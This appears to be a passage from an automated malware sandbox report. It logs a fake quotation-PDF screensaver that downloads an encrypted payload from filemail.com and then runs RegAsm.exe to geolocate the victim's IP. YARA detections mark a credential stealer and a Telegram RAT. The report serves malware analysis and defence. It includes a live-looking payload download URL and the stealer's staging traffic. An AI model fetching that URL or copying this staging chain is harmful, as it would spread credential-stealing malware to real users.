                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  0192.168.2.44973223.237.50.1064437408C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-02-19 13:20:40 UTC188OUTGET /api/file/get?filekey=8zF_HFRpmGlHEZLIRYVj6h6JKBX6AxrA97KbIRR0rZ0PqDaLJe3QQYXbMA-s&pk_vid=8e2aec8f065dac991739952269c1eb95 HTTP/1.1
                                                                  Host: 1010.filemail.com
                                                                  Connection: Keep-Alive
                                                                  2025-02-19 13:20:41 UTC335INHTTP/1.1 200 OK
                                                                  Content-Length: 1151496
                                                                  Content-Type: application/octet-stream
                                                                  Last-Modified: Wed, 19 Feb 2025 08:03:10 GMT
                                                                  Accept-Ranges: bytes
                                                                  ETag: b9da41b753669e3243f900eece1449bf
                                                                  X-Transfer-ID: yekghmuybiinrlm
                                                                  Content-Disposition: attachment; filename=Nimyzjq.vdf
                                                                  Date: Wed, 19 Feb 2025 13:20:41 GMT
                                                                  Connection: close
                                                                  2025-02-19 13:20:41 UTC3279INData Raw: d7 c6 a5 12 47 b1 d5 bc fd 7c a2 78 7c 39 1b d5 de b8 b8 aa 6f 84 c7 5e 0f 4e 6e 9c 6c 49 1a 36 70 6a 57 a1 99 86 67 ed dd d4 13 57 90 8f 98 05 f0 00 59 1f 4a 69 3f d6 60 c7 f6 0f 81 74 6f 70 dc 17 d2 99 aa 3e 54 47 de e0 55 f4 26 43 6d cc d4 8f 12 27 a2 b7 96 aa c9 a5 49 6e 25 78 0c f0 b0 87 2d cc 5e 14 e5 da d6 03 94 cc 1e 30 10 5c 85 01 c0 85 70 f1 c6 3a 34 10 f9 0e 08 23 89 be 87 93 ce 57 57 14 07 0c 01 89 86 89 7b fd 7c dd e6 f7 9b ba af 22 b4 50 75 47 8c 34 7e fc f6 42 c3 cc 80 73 9c 2e 80 fb 23 23 8d 3d fa fb f3 11 a5 c2 11 57 d7 fa dc 95 08 7d bd 53 7a 7c ca f2 b4 a0 e0 69 be 05 52 d7 ec 76 fe 30 c7 92 4d 83 cf 34 c8 fa 99 cc 4e e4 6f 53 26 8f 90 8b 35 32 67 f8 6b da 3f 75 d7 4c ae c4 a0 75 5d 48 ff 4a 11 d6 aa 1e 65 54 9f 6d b6 b3 9d 0a 56 a0 71
                                                                  Data Ascii: G|x|9o^NnlI6pjWgWYJi?`top>TGU&Cm'In%x-^0\p:4#WW{|"PuG4~Bs.##=W}Sz|iRv0M4NoS&52gk?uLu]HJeTmVq
                                                                  2025-02-19 13:20:41 UTC8192INData Raw: 3e 61 57 ae ce 6f f3 5b 22 1e 8a a8 2a d6 bf 64 da fc d3 94 5a 38 35 18 7e c1 0d 83 51 c4 4e b9 f5 dd 26 1c da 1e c2 f2 9e b7 d4 fd de 76 64 bc d5 65 2d c2 1f a6 6d d9 6b f6 40 a2 a5 18 e3 e7 8f 45 fb 56 d2 6e 0c c5 95 69 37 63 bd 80 3c a7 5c d4 be d4 9b e9 87 d4 e0 93 75 8e 01 77 e7 da 3d 94 79 4b 3e 9a 9f ce 60 7f 68 2a 4f b8 04 e3 94 f9 85 ab 93 7d 81 09 6a db b3 d3 2f 87 d2 c8 04 74 08 c5 02 07 3d df f3 55 c8 37 db 2d 90 fd bd 2a 42 9a f2 30 72 0a 36 21 a2 73 66 6d cf c4 02 ad 01 79 6c 4d 64 d2 f6 1a 33 ac 83 e6 f5 aa 44 b5 9f a1 bc a5 b0 8f cc 93 60 49 db fc c6 f1 1b d8 92 32 88 b6 c1 80 16 d1 97 71 84 e9 4b ac 6a ef 14 22 8f 72 50 ac ba c0 08 d8 bd be 2b 93 d2 ce ff 7b 6f 46 25 e2 b3 7f 6e eb 3e 1d 6c 98 81 0d a3 8d 6a ed 77 07 02 bc 4d 3d ac 35 6b
                                                                  Data Ascii: >aWo["*dZ85~QN&vde-mk@EVni7c<\uw=yK>`h*O}j/t=U7-*B0r6!sfmylMd3D`I2qKj"rP+{oF%n>ljwM=5k
                                                                  2025-02-19 13:20:41 UTC8192INData Raw: 22 75 41 72 f0 fe b7 bd 84 0e d6 43 d3 67 00 17 09 a6 18 ab 96 e9 17 a7 19 e5 de 32 76 48 60 a6 0c 2b 4b ea eb c7 4d 87 b3 41 a4 cd 46 78 c9 9e b3 3e 0e 5d be 0a 3c e2 7b 42 0b 91 53 f1 b5 d5 8c 17 6d 10 d3 43 38 ad 3a c5 97 9b 5f 48 86 47 b1 cf c0 4f 7e 04 44 a3 55 1b 2a c0 6c 5b 05 9b 0e 0f 0d 0b 0f 6f 0c e3 4e ae a6 69 ec c5 d9 48 70 e5 1c b0 3a de 10 4a 17 71 4a a0 31 cb f1 72 ca 93 20 18 ba be d8 43 17 2b ad bb 1e 0e cc 56 83 00 07 77 93 07 db 2b c7 a0 d7 fa 89 9a 51 72 53 bc 53 97 48 31 3c f4 93 87 d1 43 f3 40 95 42 93 ae 16 cb 37 7c f3 c6 d2 a7 3a 95 29 4a 0b b3 e7 3a fb 62 b1 1c 1b 6b 56 2a 93 89 96 e4 42 94 64 3e d8 07 53 ff ff df 30 0c 59 43 28 3b c3 52 fb 03 ec 90 cb 1b 55 89 48 e2 e8 e0 32 5d c9 d5 b9 73 3d 97 b3 18 2c 28 1f 15 14 1f 21 4b 1f
                                                                  Data Ascii: "uArCg2vH`+KMAFx>]<{BSmC8:_HGO~DU*l[oNiHp:JqJ1r C+Vw+QrSSH1<C@B7|:)J:bkV*Bd>S0YC(;RUH2]s=,(!K
                                                                  2025-02-19 13:20:41 UTC8192INData Raw: f5 91 01 92 28 b4 85 06 1a 1b 09 de dd 4d 7d 54 37 11 f1 21 60 0e 6f 82 5f 3b 23 74 bc 7c 7c ab dc e0 97 c5 24 d0 1d 99 d8 a8 3d 1e 27 c2 06 84 f3 09 d9 f0 4d ea 10 c9 38 40 1f f3 22 26 af aa 45 6b 73 13 83 64 40 58 8a 88 11 e0 e8 82 77 95 78 1d 14 07 f1 93 37 d5 0d 29 78 63 ce c9 71 86 b7 22 e1 4f 74 ae 8c 55 ad 68 a8 de b5 97 47 b4 98 82 a3 ea bf ec 6a 41 2d c1 30 5e 3a e7 4e 11 cf 49 6e 22 67 a4 db 29 15 24 63 8b b0 6d a3 d9 2a 29 49 19 aa 8b 2f dd c3 47 ac 39 b6 da 22 81 0d d8 2e 4c f6 3a 6c 15 7f 3e c4 01 e8 df 38 90 b1 9c 88 3d 54 1f 6d a2 c1 36 02 56 e9 d8 74 f4 7d 57 cb 8f 85 73 3d d6 a1 ff 5e 4e 7e 34 ad 32 95 eb 12 eb f2 74 b0 66 19 60 c4 1e 3c dd 27 02 28 fd 98 b0 35 73 be 25 a6 cb b2 d4 13 c7 68 a0 6f 6f f1 c4 dc aa d9 7d 09 6b fe fb 1a 2e 8a
                                                                  Data Ascii: (M}T7!`o_;#t||$='M8@"&Eksd@Xwx7)xcq"OtUhGjA-0^:NIn"g)$cm*)I/G9".L:l>8=Tm6Vt}Ws=^N~42tf`<'(5s%hoo}k.
                                                                  2025-02-19 13:20:41 UTC8192INData Raw: 66 06 e2 df c8 21 40 8d 61 53 16 da fc 41 fd 16 5d 8a 8f dd 4f 9d 56 09 8d 36 ac 7c ec ca 81 15 44 f4 d8 f2 e7 af 72 20 01 4a bf 2f ca a3 59 c3 54 f9 fb e0 8e 85 56 6f f5 14 8c 61 ea 83 d0 96 08 d3 4b 71 b1 ba 7c 79 ee 2c 13 9e 8e c7 ad 7c 6e 4a 12 2a ae 1e c1 73 26 69 ce fa 38 be 44 5f 9b 60 74 a5 3c 6b 0f e8 b8 5a 6a 1d 90 e7 92 33 fc 23 57 89 cb 9c 71 f2 ff 23 9f 4a 17 69 3b c4 d6 d1 32 00 06 03 4b 80 92 6f 51 b1 e6 e7 d5 8a 20 69 d9 46 e5 ee 07 bf aa 72 f7 f6 a4 ca 28 a3 2e bb 49 86 4b f9 e5 7f 70 ab 20 ce d4 c5 f6 db 6e 7d 6d 16 28 03 f9 94 78 e7 df 13 b7 ca 2f 3d 55 b8 44 75 10 89 8d 0f 3a ef fc b6 a2 12 f6 ab c6 7f 8b 82 25 38 de a8 26 eb 9f c5 ca f6 ee 06 bf 4c 60 73 fe 74 02 e8 62 a6 5f ff ea 18 89 92 eb 68 2e c3 04 f6 1a b1 20 27 4f 73 94 ac 2d
                                                                  Data Ascii: f!@aSA]OV6|Dr J/YTVoaKq|y,|nJ*s&i8D_`t<kZj3#Wq#Ji;2KoQ iFr(.IKp n}m(x/=UDu:%8&L`stb_h. 'Os-
                                                                  2025-02-19 13:20:41 UTC8192INData Raw: 9c e4 c4 8d 4b 6b a4 9e db 37 73 95 72 18 f6 27 dc 77 82 90 47 f9 8a 70 8e e2 89 08 8f c4 b3 18 82 a3 1f 56 bd 8c 35 00 0c 94 e4 10 70 84 8c ed d9 fc af 27 e2 81 72 5a 9c 6c 39 82 c4 5a 62 8d 61 50 d2 cf 4a 16 65 8b e2 10 d9 73 7f ed 9c d3 49 e6 ed 6b 1c a0 9f 60 eb 6d 41 8a 2b 1c 82 92 7c 1e 38 23 42 4b 07 7c e7 5a 16 39 ec d3 70 4e 29 93 79 05 3e 20 08 e4 29 bd 58 c2 6d b1 45 cb 1c 29 b5 5e 9e ad 8c 5b 18 4c ad f5 50 ea b2 81 9b 44 f8 1e e5 1e 21 20 f7 14 74 fb 0d 2c c6 f3 6a 5c 52 50 e6 ad 8d 4a 34 82 54 ff f0 69 7b e9 c3 bc 69 c4 24 b6 da 8a c3 89 0b da 30 fd 98 91 52 c5 ec 48 95 36 98 7d b8 16 25 e4 68 80 6d d2 97 15 bc 3b c6 c0 aa 6a 80 88 f7 2a 05 66 57 12 74 5f 79 f3 e7 dc 58 a2 1b 3e 5e fa 6a 35 cd 35 f0 37 db d0 1d 93 e5 16 1d e3 dd 36 c9 3e d1
                                                                  Data Ascii: Kk7sr'wGpV5p'rZl9ZbaPJesIk`mA+|8#BK|Z9pN)y> )XmE)^[LPD! t,j\RPJ4Ti{i$0RH6}%hm;j*fWt_yX>^j5576>
                                                                  2025-02-19 13:20:41 UTC8192INData Raw: 6e f8 cd 47 7b 01 d4 fc 94 75 93 44 ab 1c 5a 67 d6 b3 7e 0b d8 f1 14 b5 48 77 e2 b2 6f 6e 99 6a 82 8d 76 bf be 94 29 19 c9 3a 26 7c 46 a6 83 5b 06 4d 20 8b d7 c6 7a 44 e4 18 6e 8c 5b 3c 3c 7c af 50 4a a8 50 d6 1f f0 37 b4 ba ef 59 48 3d 96 ba c7 d6 62 55 d6 f3 2f d0 33 35 28 b0 2c d8 27 d6 a4 bc ce e2 e8 4f df d9 b1 5c 2a a4 b9 0c b5 ae 88 58 45 82 c7 91 b7 ce 1e 99 10 8f a0 42 ac 6b a3 ed 7d ed 02 5d a6 4e 42 44 12 8c 4a 2d e5 24 91 a0 3a a5 62 5b 21 d2 aa 5f cb 7c 02 fe 5a d8 1f 94 1c 5a a6 d3 0e 6b 71 06 0a 16 70 99 b3 d5 7b 68 18 7e e0 4d 51 f9 c7 cd d1 78 6d 58 86 a5 fd c8 45 76 2e e4 0d 98 4b ab 1e bd a1 35 2d 16 9f 3b a3 0a 5b 1e 67 b7 f7 52 d8 ec 84 7a 62 02 3a 85 48 ff 4f 12 58 78 2c 26 51 ce 91 d8 15 4a 7c 14 a9 9c 8f 45 2c a8 44 77 60 86 70 ff
                                                                  Data Ascii: nG{uDZg~Hwonjv):&|F[M zDn[<<|PJP7YH=bU/35(,'O\*XEBk}]NBDJ-$:b[!_|ZZkqp{h~MQxmXEv.K5-;[gRzb:HOXx,&QJ|E,Dw`p
                                                                  2025-02-19 13:20:41 UTC8192INData Raw: 3f 14 e6 7d 02 98 9f a6 0d 03 0e 27 62 ae 82 c1 f8 6a 36 96 69 26 cd 93 17 8f eb 16 4f dd 0b d7 3c d2 9c ee 64 22 75 81 03 1d ec d3 60 54 58 f2 e5 21 9c 99 f8 5f 74 4b 66 40 af 50 8d ad ba 55 e6 76 9d 82 af db 8c 09 1d 85 de 7c 20 fe 61 9e 64 5b ce b4 ba a3 2b 0d d9 69 39 47 eb 1b ec 62 43 32 f4 00 28 56 4a 76 e5 8b e8 0e 93 ff 4b 3c 58 e5 95 86 0b 5b fc fc 2f b5 42 e8 39 3b 27 74 1b 35 e4 0d 75 16 10 f0 b2 28 e0 96 1e 32 e3 7f 44 c5 12 45 0c 08 eb 0d a1 3a 4e 52 ce 7a 02 66 d0 87 04 3d d5 3e 9b 03 7d 5f c5 66 9e 22 1a ea 24 d8 e1 c9 85 a6 e1 42 e3 3f f6 b1 be d0 30 3f 97 bf 11 6e 8b 13 fe 0a 12 27 c9 54 c9 f7 dd 9e 88 a9 d6 98 b5 8e 60 6c 47 af 40 e0 02 f8 c4 1f c9 64 04 6c d0 eb 5f 0e a8 0b d3 38 98 5c 00 4d b4 7c 17 d0 70 9d 32 86 24 f4 3b db 57 a1 6d
                                                                  Data Ascii: ?}'bj6i&O<d"u`TX!_tKf@PUv| ad[+i9GbC2(VJvK<X[/B9;'t5u(2DE:NRzf=>}_f"$B?0?n'T`lG@dl_8\M|p2$;Wm
                                                                  2025-02-19 13:20:41 UTC8192INData Raw: 9b 28 08 7e 4b d7 f0 c8 88 b4 fd d5 5e b8 f7 df 23 8b eb 5e 14 12 7d 8b 9b 25 c0 40 44 94 85 ae 32 2a a7 6b 5f a7 d4 95 14 bb d6 77 c9 a8 cb b4 36 de 09 45 6a 7a f7 cf 70 c7 64 50 1e 95 7e 12 76 75 97 f6 50 1d 20 05 69 0c 57 f3 b8 ea 1b f6 cb dd ea 87 47 88 8a b9 72 1e 36 86 6c ed a8 82 94 ef bd 12 ed 61 7b 2f a3 4a 14 97 5e 5e 5d 64 a3 c5 b7 50 58 0f 26 35 2a 3e 82 88 d8 d4 99 18 c9 2a b5 d1 69 3d 6d a5 36 c6 cf 8d bb da af 3e dc ca 54 4b fc cc 9f f1 ee 27 39 66 0e 7a b4 ed 3a 1b 84 5a 43 9f 37 ec de f8 fd 75 0f 7d 78 36 f1 d1 9e 33 e5 c8 ff f6 d0 f9 f3 e4 6b bf ac 30 c5 24 d6 54 66 73 4a 2e 26 4b b7 ac 5b c8 8b d5 87 59 0a 44 45 48 e7 d0 be b7 e1 40 d5 76 89 7b 14 29 f3 d5 d9 68 c8 8d 5d ad f9 42 6b de a7 e9 24 7d 39 86 9a a7 11 19 26 c9 9d ed 26 57 b9
                                                                  Data Ascii: (~K^#^}%@D2*k_w6EjzpdP~vuP iWGr6la{/J^^]dPX&5*>*i=m6>TK'9fz:ZC7u}x63k0$TfsJ.&K[YDEH@v{)h]Bk$}9&&W
                                                                  2025-02-19 13:20:41 UTC8192INData Raw: e7 71 d3 12 38 a6 fe 75 53 f5 46 d9 87 a2 be 55 bd 34 23 04 cd 2c 75 a7 99 37 65 79 35 96 a6 d1 a8 26 28 b3 58 11 aa a8 e1 3c 8a 62 a8 28 a5 ef 3a 18 21 84 7c 1b 52 9d 7c a8 d2 06 5a 34 ad f5 b5 db 84 a2 41 7b 5e dc 68 b9 5a 85 26 38 1b 80 83 61 15 cb 2f 5e 2c 97 9f 03 35 36 73 72 1c 93 e2 fc ac c2 da 33 be bb c4 3c 86 d5 df c5 1d 11 9c 15 07 8a 34 19 19 32 1d 94 42 01 0b 11 d4 9f c9 7e 41 62 a3 0c 4e 96 64 a3 f1 b0 d7 c5 c8 e6 b1 ea fa 60 34 08 c3 1f 5b ae 71 cd 1c d5 81 31 e4 c2 19 61 c2 2b b4 9b f9 ab d8 9b 82 37 ca e7 ac d3 fa 7f e1 56 da 84 c7 c9 f2 6a 62 ae 50 b3 d7 e6 d1 22 01 3a 1d 3f 0f fe 7c 16 ad 55 2c 82 eb 0d cc 7c 76 09 2d 0b 7b de 0e 0f c5 f0 31 23 3d f7 62 c7 ed be 28 f4 00 0f 48 b4 48 be fe cb da fb 4b 36 e6 30 16 3e c2 fc 26 ba b0 80 e5
                                                                  Data Ascii: q8uSFU4#,u7ey5&(X<b(:!|R|Z4A{^hZ&8a/^,56sr3<42B~AbNd`4[q1a+7VjbP":?|U,|v-{1#=b(HHK60>&


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  1192.168.2.449741104.21.48.14437908C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-02-19 13:21:33 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                  Host: reallyfreegeoip.org
                                                                  Connection: Keep-Alive
                                                                  2025-02-19 13:21:33 UTC862INHTTP/1.1 200 OK
                                                                  Date: Wed, 19 Feb 2025 13:21:33 GMT
                                                                  Content-Type: text/xml
                                                                  Content-Length: 362
                                                                  Connection: close
                                                                  Age: 203061
                                                                  Cache-Control: max-age=31536000
                                                                  cf-cache-status: HIT
                                                                  last-modified: Mon, 17 Feb 2025 04:57:11 GMT
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ORJHI5lqXX0H8x1C%2B9BfCcV7GnKAa99ojR3KotCbLJm6RBACGkS5HI05S8ZhWiwIX22HQ%2FN%2FTjIRrqQ4r2qccDa9JoYiWamNj2lmN%2Bb3K%2B%2Bl2HJCRtmsdfSH%2BNjsgDEqvW5oByF6"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 91468f87efebc45c-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1622&min_rtt=1614&rtt_var=622&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1733966&cwnd=246&unsent_bytes=0&cid=c93823717b1da58b&ts=208&x=0"
                                                                  2025-02-19 13:21:33 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                  Click to jump to process

                                                                  Click to jump to process

                                                                  Click to dive into process behavior distribution

                                                                  Click to jump to process

                                                                  Target ID:0
                                                                  Start time:08:20:37
                                                                  Start date:19/02/2025
                                                                  Path:C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr" /S
                                                                  Imagebase:0xdf0000
                                                                  File size:1'103'360 bytes
                                                                  MD5 hash:4FC67D8DC05024C14E049D23487A84D7
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2226699586.0000000007212000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2212483137.000000000339C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Target ID:4
                                                                  Start time:08:21:30
                                                                  Start date:19/02/2025
                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                  Imagebase:0x680000
                                                                  File size:65'440 bytes
                                                                  MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2945027047.0000000002B99000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000004.00000002.2945027047.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  Reset < >